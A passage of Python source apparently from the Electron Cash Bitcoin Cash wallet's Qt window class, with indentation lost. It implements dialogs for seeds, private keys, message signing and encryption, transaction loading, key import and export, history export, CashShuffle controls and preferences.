grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self.top_level_window(), seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electron Cash, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + self.msg_sign)
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
import traceback
traceback.print_exc()
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self.top_level_window(), _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
try:
privkey = self.wallet.export_private_key(addr, password)
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
private_keys[addr.to_ui_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history(fx=self.fx)
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance']]
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.gui_object.is_cashaddr():
return QIcon(":icons/tab_converter.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def cashaddr_status_tip(self):
if self.gui_object.is_cashaddr():
return _('Address Format') + ' - ' + _('CashAddr')
else:
return _('Address Format') + ' - ' + _('Legacy')
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
self.addr_converter_button.setStatusTip(self.cashaddr_status_tip())
def toggle_cashaddr_status_bar(self):
self.gui_object.toggle_cashaddr()
self.statusBar().showMessage(self.cashaddr_status_tip(), 2000)
def toggle_cashaddr_settings(self, state):
self.gui_object.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.print_error('*** WARNING ElectrumWindow.toggle_cashaddr: This function is deprecated. Please do not call it!')
self.gui_object.toggle_cashaddr(on)
def cashshuffle_plugin_if_loaded(self):
return self.gui_object.plugins.get_internal_plugin("shuffle", force_load = False)
def is_cashshuffle_enabled(self):
plugin = self.cashshuffle_plugin_if_loaded()
return bool(plugin and plugin.is_enabled() and plugin.window_has_cashshuffle(self))
def cashshuffle_icon(self):
if self.is_cashshuffle_enabled():
if self._cash_shuffle_flag == 1:
return QIcon(":icons/cashshuffle_on_error.svg")
else:
return QIcon(":icons/cashshuffle_on.svg")
else:
self._cash_shuffle_flag = 0
return QIcon(":icons/cashshuffle_off.svg")
def update_cashshuffle_icon(self):
self.cashshuffle_status_button.setIcon(self.cashshuffle_icon())
loaded = bool(self.cashshuffle_plugin_if_loaded())
en = self.is_cashshuffle_enabled()
if self._cash_shuffle_flag == 0:
self.cashshuffle_status_button.setStatusTip(_("CashShuffle") + " - " + _("ENABLED") if en else _("CashShuffle") + " - " + _("Disabled"))
rcfcm = _("Right-click for context menu")
self.cashshuffle_status_button.setToolTip(
(_("Toggle CashShuffle") + "\n" + rcfcm)
#(_("Left-click to view pools") + "\n" + rcfcm) if en
#else (_("Toggle CashShuffle") + "\n" + rcfcm)
)
self.cashshuffle_toggle_action.setText(_("Enable CashShuffle") if not en else _("Disable CashShuffle"))
self.cashshuffle_settings_action.setText(_("CashShuffle Settings..."))
self.cashshuffle_viewpools_action.setEnabled(True)
elif self._cash_shuffle_flag == 1: # Network server error
self.cashshuffle_status_button.setStatusTip(_('CashShuffle Error: Could not connect to server'))
self.cashshuffle_status_button.setToolTip(_('Right-click to select a different CashShuffle server'))
self.cashshuffle_settings_action.setText(_("Resolve Server Problem..."))
self.cashshuffle_viewpools_action.setEnabled(False)
self.cashshuffle_settings_action.setVisible(en or loaded)
self.cashshuffle_viewpools_action.setVisible(en)
if en:
# ensure 'Disable CashShuffle' appears at the end of the context menu
self.cashshuffle_status_button.removeAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.removeAction(self.cashshuffle_toggle_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_toggle_action)
else:
# ensure 'Enable CashShuffle' appears at the beginning of the context menu
self.cashshuffle_status_button.removeAction(self.cashshuffle_separator_action)
self.cashshuffle_status_button.removeAction(self.cashshuffle_toggle_action)
actions = self.cashshuffle_status_button.actions()
self.cashshuffle_status_button.insertAction(actions[0] if actions else None, self.cashshuffle_separator_action)
self.cashshuffle_status_button.insertAction(self.cashshuffle_separator_action, self.cashshuffle_toggle_action)
def show_cashshuffle_settings(self):
p = self.cashshuffle_plugin_if_loaded()
if p:
msg = None
if self._cash_shuffle_flag == 1:
# had error
msg = _("There was a problem connecting to this server.\nPlease choose a different CashShuffle server.")
p.settings_dialog(self, msg)
#else: # commented-out. Enable this if you want to use the non-modal network settings as the destination for this action
# # no error -- use the free-floating non-modal network dialog
# if not p.show_cashshuffle_tab_in_network_dialog(self):
# # Huh. Network dialog creation/show failed. Fall back to modal window
# p.settings_dialog(self, msg)
def show_cashshuffle_pools(self):
p = self.cashshuffle_plugin_if_loaded()
if p:
p.view_pools(self)
def cashshuffle_icon_leftclick(self):
self.toggle_cashshuffle()
return
# delete the above 2 lines if we want the left-click to revert to
# Josh's suggestion (leaving the code in here for now)
if self.is_cashshuffle_enabled():
if self._cash_shuffle_flag != 0:
# Jump to settings.
self.cashshuffle_settings_action.trigger()
return
if self.cashshuffle_viewpools_action.isVisible():
# New! We just let this icon be the "View pools..." action when
# the plugin is already loaded and enabled. This hopefully will
# discourage disabling. Also it's been found that "View pools..."
# is the most popular action anyway -- might as well make it
# convenient to access with 1-click. (@zquestz suggested this)
self.cashshuffle_viewpools_action.trigger()
return
#else... in all other cases just toggle cashshuffle
self.toggle_cashshuffle()
def toggle_cashshuffle(self):
if not self.is_wallet_cashshuffle_compatible():
self.show_warning(_("This wallet type cannot be used with CashShuffle."), parent=self)
return
plugins = self.gui_object.plugins
p0 = self.cashshuffle_plugin_if_loaded()
p = p0 or plugins.enable_internal_plugin("shuffle")
if not p:
raise RuntimeError("Could not find CashShuffle plugin")
was_enabled = p.window_has_cashshuffle(self)
if was_enabled and not p.warn_if_shuffle_disable_not_ok(self):
# user at nag screen said "no", so abort
self.update_cashshuffle_icon()
return
enable_flag = not was_enabled
self._cash_shuffle_flag = 0
KillPopupLabel("CashShuffleError")
if not p0:
# plugin was not loaded -- so flag window as wanting cashshuffle and do init
p.window_set_wants_cashshuffle(self, enable_flag)
p.init_qt(self.gui_object)
else:
# plugin was already started -- just add the window to the plugin
p.window_set_cashshuffle(self, enable_flag)
self.update_cashshuffle_icon()
self.statusBar().showMessage(self.cashshuffle_status_button.statusTip(), 3000)
if enable_flag and self.config.get("show_utxo_tab") is None:
self.toggle_tab(self.utxo_tab) # toggle utxo tab to 'on' if user never specified it should be off.
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self.top_level_window(), _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom Fee Rate'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
